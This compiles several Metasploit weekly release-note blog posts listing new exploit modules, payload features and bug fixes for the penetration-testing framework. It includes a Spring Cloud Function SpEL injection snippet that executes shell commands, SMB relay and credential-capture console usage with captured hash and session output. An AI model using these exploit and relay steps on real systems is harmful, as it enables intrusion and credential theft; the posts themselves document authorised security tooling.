• #16477 from bcoles – This PR updates several modules to remove hardcoded URL references to the soon to be deprecated cve.mitre.org site, and where applicable, add in CVE references in place of these hardcoded URL references.

Bugs fixed (5)

• #16318 from heyder – Adds support to old key exchange algorithms in the net/ssh lib by defining the append_all_supported_algorithms to true.
• #16379 from heyder – Refactored a number of modules to use ssh_client_defaults.
• #16426 from usiegl00 – This fixes a crash in OSX Meterpreter’s stager caused by mangled dyld functions in MacOS Monterey.
• #16457 from jmartin-r7 – Recent updates in Rex::Parser::Arguments regressed the ability to have short flags with multiple characters. This restores functionality by updating the spec checks and library code to appropriately parse multiple character short flags and each individual short flag specified in a combined short flag.
• #16479 from cdelafuente-r7 – Meterpreter’s reg setval command has been updated to allow setting a REG_BINARY key value with the -d option with an arbitrarily long binary blob. Previously, this value was treated as a string which lead to an incorrect value being set in the registry field.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.38…6.1.39
• Full diff 6.1.38…6.1.39

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/04/15/metasploit-wrap-up-152/

Meterpreter Debugging

A consistent message Metasploit hears from users is that debugging and general logging support could be improved. The gaps in functionality make it difficult for users to understand what happens when things go wrong and for new and existing developers to fix bugs and add new features. The Metasploit team has been trying to improve this in various parts of the framework, the most recent being Meterpreter. Meterpreter payloads now have additional debugging options that can be used to inspect the internal workings of the payload as it is running. These options include MeterpreterDebugLogging, which can be used to select where the log file is placed on the remote machine, and MeterpreterDebugBuild, which controls whether or not the deployed Meterpreter supports debugging. For many Meterpreter builds, the additional debugging information would include large, easily signature-able strings that should not be present for typical operations. For this reason, users on active engagements that do not require additional logging should leave this setting off.

This functionality pairs nicely with the recently added SessionTlvLogging option, which can display the C2 traffic used by Meterpreter. With these options, both the internal state and the individual requests and responses can be inspected to understand what is happening. This should hopefully contribute to making Meterpreter a little less enigmatic.

WordPress Library Improvement

Metasploit contains quite a few modules targeting various WordPress vulnerabilities, many of which are in plugins. Almost all of these modules utilize the common WordPress library that Metasploit provides. This week that library was improved to properly handle target WordPress configurations that do not place the REST API under the standard /index.php/ path. This should improve the reliability of these modules by properly accounting for the target’s configuration.

Enhancements and features (5)

• #16377 from sjanusz-r7 – The Python Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console that the payload was run in. A new MeterpreterDebugLogging datastore option allows writing these log files on the host that ran the payload.
• #16396 from sjanusz-r7 – The PHP Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console the payload was run in. A new MeterpreterDebugLogging datastore option allows for writing these log files on the host that ran the payload.
• #16411 from jmartin-r7 – Improves the RPC analyze host functionality to return additional module suggestion metadata such as invalid options or missing module requirements.
• #16418 from adfoster-r7 – This adds the boilerplate for placing the debugging Meterpreter sessions wiki page to the docs site.
• #16451 from dwelch-r7 – This ensures that if MeterpreterDebugBuild is enabled, that the debug versions of the extensions are also used. This allows extensions can now also output debug messages visible via tools such as dbgview, which can be helpful when debugging payloads or Meterpreter extensions.

Bugs fixed (2)

• #16221 from gwillcox-r7 – This fixes WordPress support to work with sites where the REST API is not under /index.php/.
• #16455 from adfoster-r7 – This removed the requirement for railgun support in modules that used the Post::File mixin, enabling better identification of modules usable against an existing session.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.37…6.1.38
• Full diff 6.1.37…6.1.38

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/

CVE-2022-22963 – Spring Cloud Function SpEL RCE

A new exploit/multi/http/spring_cloud_function_spel_injection module has been developed by our very own Spencer McIntyre which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to Spring4Shell CVE-2022-22965, which is a separate vulnerability in the WebDataBinder component of Spring Framework.

This exploit works by crafting an unauthenticated HTTP request to the target application. When the spring.cloud.function.routing-expression HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the CVE-2022-22963 Metasploit module:

res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(datastore['TARGETURI']),
    'headers' => {
    'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"
    }
)

Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message

New module content (1)

• Spring Cloud Function SpEL Injection by Spencer McIntyre, hktalent, and m09u3r, which exploits CVE-2022-22963 – This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.

Bugs fixed (2)

• #16364 from zeroSteiner – This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer and adds documentation for the module.
• #16386 from adfoster-r7 – Fixes a crash when running the exploit/multi/misc/java_rmi_server module against at target server, such as Metasploitable2

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.35…6.1.36
• Full diff 6.1.35…6.1.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/03/25/metasploit-weekly-wrap-up-154/

Capture Plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture. Users can start and configure each of these modules individually, but now the capture plugin can streamline the process. The capture plugin can easily start 13 different services (17 including SSL enabled versions) on the same listening IP address including remote interfaces via Meterpreter. A configuration file can be used to select individual services to start and once finished, all services can easily be stopped using a single command.

To use the plugin, it must first be loaded. That will provide the captureg command (for Capture-Global) which then offers start and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.159.128
Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs
msf6 >

NATed Services

This week Metasploit added features to libraries that provide listening services like HTTP, FTP, LDAP, etc. that allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules to be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListernBindAddress option to one that Metasploit can listen on. In this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Enhancements and features (4)

• #16249 from gwillcox-r7 – This expands on the work done in https://github.com/rapid7/metasploit-framework/pull/16164 and adds in a new library named Msf::Exploit::Remote::HTTP::Exchange which will allow for future Exchange library functions.
• #16250 from zeroSteiner – Adds new ListenerBindPort and ListenerBindAddress options on modules which expose services such as HTTP, SMB, LDAP, FTP, etc. This allows users to specify a separate IP/Port to bind to, in addition to providing SRVHOST/SRVPORT values. These additional options are useful if Metasploit is running in a network behind a NAT, or when pivoting through a compromised target. The naming convention is similar to the payload options ReverseListenerBindAddress and ReverseListenerBindPort
• #16298 from smashery – This adds the new "capture" plugin which can be used to easily start and stop credential-capturing services.
• #16352 from adfoster-r7 – The discussion tag has been added to allow for more long term discussions. This will replace the existing Discussions tab, and issues marked as such will not be automatically closed.

Bugs fixed (12)

• #16207 from h00die – The VNC libraries and associated modules have been updated to support more modern versions of VNC and to fix a few bugs so that they will work correctly with new VNC versions.
• #16309 from HynekPetrak – This fixes an issue where the ssh_login module would crash when the channel used to execute the commands to gather the platform information reported that they failed.
• #16317 from smashery – This fixes an issue with multiple modules that listen on UDP sockets where the modules were not closing and freeing the socket when their respective services were stopped.
• #16325 from sjanusz-r7 – This PR replaces IO.read with File.binread, in scenarios where it’s obvious that we’re reading from binaries, to prevent an issue where not all of the file has been read correctly due to an additional EOL<->CRLF conversion that happens on Windows.
• #16340 from bcoles – This fixes the APK injection behavior to use aapt2 if msfvenom is unable to rebuild the APK with apktool, allows more APKs to be compatible with msfvenom, and fixes a bug.
• #16341 from h00die – This fixes a bug where the auxiliary/server/capture/vnc module would not output hashes in a format compatible with John The Ripper and a bug that was causing crashes due to assuming hashes always had an associated username. Additionally, support has been added for exporting VNC hashes into a JTR compatible format for later cracking and the hash_identify function has been updated to properly identify VNC hashes allowing for better hash detection.
• #16353 from jmartin-r7 – A bug has been fixed in the Anemone library and in the HTTP crawler libraries and related module to allow pulling and setting of ssl_version from standardized options. This permits fine-grained user control and avoids issues related to missing or depreciated SSL versions in newer Ruby versions, which were at times preventing Metasploit from making successful connections to targets.
• #16358 from bcoles – This change fixes a bug in the msfvenom APK injection code, where in some situations a suitable hook point could not be found.
• #16367 from zeroSteiner – A bug was found in the way character escaping was done in apache_apisix_api_default_token_rce which has now been fixed. In addition, several updates have been made to better handle error cases that may occur when sending HTTP requests to the target.
• #16368 from zeroSteiner – This improves response time when a cache miss occurs for commands not provided by msfconsole.
• #16369 from sjanusz-r7 – This change fixes shell_to_meterpreter module to allow upgrading (or duplicating) Meterpreter sessions.
• #16371 from AlanFoster – This fixes a crash in the WebSocket library used by the Kubernetes modules that would occur when a socket method was being called that’s only provided by the Rex version.
• #16361 from bcoles – Thisadds docs for the adb_server_exec module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.34…6.1.35
• Full diff 6.1.34…6.1.35

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/03/18/metasploit-weekly-wrap-up-153/

CVE-2022-21999 – SpoolFool

Our very own Shelby Pace has added a new module for the CVE-2022-21999 SpoolFool privilege escalation vulnerability. This escalation vulnerability can be leveraged to achieve code execution as SYSTEM. This new module has successfully been tested on Windows 10 (10.0 Build 19044) and Windows Server 2019 v1809 (Build 17763.1577).

CVE-2021-4191 – Gitlab GraphQL API User Enumeration

Jake Baines has contributed a new module for CVE-2021-4191, which queries the GitLab GraphQL API to acquire the list of GitLab users without authentication. There’s some news coverage from earlier this month here. The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.

Adapted Payloads

Spencer McIntyre has added a new payload type that allows existing modules to be adapted for new scenarios. For example, modern exploits often deliver OS command payloads while Metasploit users would prefer to have more fully-featured native payloads (like Meterpreter delivered) and these scenarios are often special cases handled by the module author. Metasploit’s new payload adapters allow payloads from one architecture to be converted to another for seamless compatibility with a wider variety of exploit modules. The first entry for this new type is an adapter that converts Python payloads to OS command payloads, allowing any exploit capable of executing a Unix Command payload to deliver a Python Metepreter in memory. For additional ease of use, the correct Python binary is automatically determined.

New module content (3)

• Windows IIS HTTP Protocol Stack DOS by Axel Souchet, Maurice LAMBERT, Max, and Stefan Blair, which exploits CVE-2021-31166 – A new module has been added that exploits CVE-2021-31166, a UAF bug in http.sys when parsing Accept-Encoding headers, to cause a BSoD and denial of service on vulnerable IIS servers.
• GitLab GraphQL API User Enumeration by jbaines-r7 and mungsul, which exploits CVE-2021-4191 – This adds an auxiliary module that enumerates Gitlab user accounts via the GraphQL API which does not require authentication when querying user information.
• CVE-2022-21999 SpoolFool Privesc by Oliver Lyak and Shelby Pace, which exploits CVE-2022-21999 – This adds a module targeting SpoolFool (AKA CVE-2022-21999), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.

Enhancements and features (2)

• #16186 from zeroSteiner – This adds an additional Adapter payload type which can be used in a scenario such as wanting to deliver a full Meterpreter session from a command payload.
• #16262 from zeroSteiner – This updates the default payload selection so that cmd/unix/reverse_bash is chosen over cmd/unix/reverse_netcat by default unless RequiredCmd is set such that the module cannot execute Bash payloads.

Bugs fixed (7)

• #16316 from smashery – This ensures individual modules no longer accidentally shut down joint services that are used across multiple modules/handlers etc, such as HTTP servers. Modules will now correctly unregister interest in the global service, and if there are no longer any interested modules in the running global service, it will be shut down correctly.
• #16324 from smashery – This fixes an issue in the DNS native server module where the server would crash upon receiving a query.
• #16326 from zeroSteiner – This fixes SMB signing detection for the scanner/smb/smb_version module when the target server has SMB1 disabled.
• #16332 from bcoles – This change fixes a bug in APK injection where the native libraries would not automatically be aligned with zipalign, and would fail to install on a device.
• #16334 from bcoles – This change fixes a bug where APK files that were not signed with the v1 scheme would fail during the signing phase of APK file injection with msfvenom.
• #16347 from zeroSteiner – This updates the normalize_host method so that when it attempts and fails to resolve a hostname to an IP address, it will return nil instead of raising an exception. Previously this exception would result in modules like auxiliary/gather/enum_dns crashing instead of saving the information it had managed to gather on the target so far.
• #16350 from sjanusz-r7 – This fixes an unintentional crash when using payload/windows/x64/encrypted_shell_reverse_tcp without having a database configured

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.33…6.1.34
• Full diff 6.1.33…6.1.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/03/11/metasploit-weekly-wrap-up-3/

Mucking out the pipes.

Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber’s training. The exploit targeting modern Linux v5 kernels helps elevate user privileges by overwriting a SUID binary of your choice by plunging some payload gold through a pipe.

Long live the SMB relay!

SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7 the windows/smb/smb_relay module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through them to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation

Return of the GSoC!

The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications are will open April 4th and close April 19th. Changes this year open the program up to all newcomers of open source that are 18 years and older. Join use on #slack and checkout our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you’d like to add to Metasploit.

New module content (5)

• WordPress MasterStudy Admin Account Creation by Numan Türle and h00die, which exploits CVE-2022-0441 – This adds an auxiliary module that leverages a sanitization issue in the WordPress plugin MasterStudy to create an admin account in WordPress.
• Dirty Pipe Local Privilege Escalation via CVE-2022-0847 by Max Kellermann and timwr, which exploits CVE-2022-0847 – This exploits a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as the root user.
• APISIX Admin API default access token RCE by Heyder Andrade and YuanSheng Wang, which exploits CVE-2022-24112 – This adds an unauthenticated exploit targeting Apache APISIX. It leverages two vulnerabilities, the first of which is a default API key and the second is an IP restriction bypass. The result is OS command execution as the service user.
• pfSense Diag Routes Web Shell Upload by Abdel Adim "smaury" Oisfi of Shielder and jbaines-r7, which exploits CVE-2021-41282 – This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.
• SMB Relay Rewrite from adfoster-r7 – Updates the SMB relay module to support relaying to targets over SMB 2 and SMB 3. It also adds intelligent targeting for multiple hosts so if the incoming authentication information is incompatible with one, the next target host will be tried.

Enhancements and features

• #16135 from sjanusz-r7 – This adds support for logging Meterpreter’s TLV Packets with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>.
• #16141 from adfoster-r7 – This adds service manager commands to msfconsole.
• #16219 from sjanusz-r7 – This updates the packet inspection for the enumextcmd and loadlib commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.
• #16258 from sjanusz-r7 – This improves Meterpreter’s TLV logging support to show human readable names for the Meterpreter TLV values of. To view this functionality run setg SessionTlvLogging true with a Meterpreter session open. Next, run a Meterpreter command such as dir.
• #16269 from bcoles – This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
• #16270 from bcoles – This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
• #16282 from 3V3RYONE – This adds the lcat command to Meterpreter which allows the user to cat a local file.
• #16288 from bcoles – This change display the output of apktool if the apktool output contains Java exceptions, which is useful for debugging errors in Android APK injection.

Bugs fixed

• #16145 from adfoster-r7 – This fixes a case sensitivity issue with option handling for the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
• #16153 from jmartin-r7 – This fixes a bug in the auxiliary/client/smtp/emailer which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
• #16265 from smashery – This fixes an edgecase which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
• #16268 from bwatters-r7 – This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.
• #16283 from bcoles – This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
• #16286 from bcoles – This fixes a payload truncation issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
• #16294 from bcoles – This change fixes the Android APK injection functionality of msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
• #16310 from adfoster-r7 – This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
• #16311 from sjanusz-r7 – This updates msfconsole’s search functionality to include the 64 bit variant of payload_windows/x64/encrypted_shell payloads
• #16312 from bwatters-r7 – This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
• #16322 from zeroSteiner – This fixes a regression issue with the hosts command tab completion and the --search option’s functionality.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.32…6.1.33
• Full diff 6.1.32…6.1.33

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/02/25/metasploit-weekly-wrap-up-2/

Exchange RCE

Exchange remote code execution vulnerabilities are always valuable exploits to have. This week Metasploit added an exploit for an authenticated RCE in Microsoft Exchange servers 2016 and server 2019 identified as CVE-2021-42321. The flaw leveraged by the exploit exists in a misconfigured denylist that failed to prevent a serialized blob from being loaded resulting in code execution. While this is an authenticated vulnerability, a standard user has sufficient permissions to trigger it which likely encompasses most users within an organization that uses Exchange. The vulnerability affects Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.

Chrome Password Decryption

Community member timwr updated the existing Chrome enumeration module to support decrypting passwords from modern versions of Chrome. The module can now decrypt both the new and old formats of passwords. This is helpful because when Chrome is updated, passwords in the old format are not updated to the new format.

New module content (2)

• Microweber CMS v1.2.10 Local File Inclusion (Authenticated) by Talha Karakumru – Adds a new module auxiliary/gather/microweber_lfi which targets Microweber CMS v1.2.10 and allows authenticated users to read arbitrary files on disk.
• Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE by Grant Willcox, Microsoft Security Response Center, Microsoft Threat Intelligence Center, peterjson, pwnforsp, testanull, and zcgonvh, which exploits CVE-2021-42321 – This adds an exploit for CVE-2021-42321 which is an authenticated RCE in Microsoft Exchange. The vulnerability is related to a misconfigured deny-list that fails to properly prevent malicious serialized objects from being loaded, leading to code execution.

Enhancements and features

• #16061 from shoxxdj – The wordpress_scanner module has been updated to support enumerating WordPress users using the wp-json API.
• #16200 from timwr – This updates post/windows/enum_chrome to support decrypting stored passwords for Chrome versions greater than 80.

Bugs fixed

• #16197 from adfoster-r7 – This fixes an edge case when reading files on Windows, and fixes Ruby 3 crashes when reading files.
• #16215 from bwatters-r7 – This updates payloads version to 2.0.75, taking in the changes landed in https://github.com/rapid7/metasploit-payloads/pull/542 and fixes a bug in Windows Meterpreter getsystem command where a failed attempt to elevate can result in a partially-broken session.
• #16093 from h00die – A number of broken URL references have been fixed in Metasploit modules. In addition, the tools/modules/module_reference.rb code has been updated to log redirects so that they can be appropriately triaged later and to support saving results to a CSV file. Finally, several modules had their code adjusted to conform to RuboCop standards.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.30…6.1.31
• Full diff 6.1.30…6.1.31

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/

Nagios XI web shell upload module

New this week is a Nagios Web Shell Upload module from Rapid7′ own Jake Baines, which exploits CVE-2021-37343. This module builds upon the existing Nagios XI scanner written by Erik Wynter. Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal exploit through an admin-authenticated PHP web shell that results in code execution as the www-data user.

Ignition for Laravel RCE module

Community contributor heyder added a module which exploits CVE-2021-3129 in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions file_get_contents() and file_put_contents().

New module content (3)

• Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump by jbaines-r7, which exploits CVE-2020-5723 – A new module has been added which exploits CVE-2020-5724, a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the users table as an unauthenticated attacker. Successfully gathered credentials will be stored in Metasploit’s credential database for use in further attacks.
• Nagios XI Autodiscovery Webshell Upload by Claroty Team82 and jbaines-r7, which exploits CVE-2021-37343 – This exploits a path traversal vulnerability in Nagios XI versions below 5.8.5 to achieve authenticated code execution as the www-data user.
• Unauthenticated remote code execution in Ignition by Heyder Andrade and ambionics, which exploits CVE-2021-3129 – This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().

Enhancements and features

• #16076 from bcoles – This change adds the Meterpreter session type to the post/osx/gather/hashdump, hiding a warning when the module is run with a Meterpreter session.
• #16117 from zeroSteiner – This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code, and fix a couple of minor bugs.
• #16161 from smashery – This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and MacOS, as well as IPad.
• #16170 from sjanusz-r7 – This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running meterpreter > sysinfo on Java.
• #16173 from AlanFoster – Adds additional --no-readline and --readline options to msfconsole for configuring the use of Readline suppor.t
• #16181 from AlanFoster – This adds a resource script for extracting the Meterpreter commands from currently open sessions.
• #16192 from zha0gongz1 – The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.
• #16195 from darrenmartyn – The hp_dataprotector_cmd_exec.rb module has been updated to support x64 payloads. This fixes a bug whereby x64 payloads were not supported as the Arch value was not set, leading it to default to x86 payloads only.

Bugs fixed

• #16174 from AlanFoster – This change fixes the mode specification on File.read required for ruby 3 on multiple modules.
• #16175 from AlanFoster – This change fixes the loadpath command summary to display the module types in alphabetical order.
• #16177 from AlanFoster – This change fixes the post(test/search) Meterpreter tests on OSX.
• #16184 from adfoster-r7 – This fixes a crash when running msfconsole on a Windows host in conjunction with the sessions -u command.
• #16194 from zeroSteiner – This fixes a crash when using Metasploit’s psexec module with the Command target.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.29…6.1.30
• Full diff 6.1.29…6.1.30

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).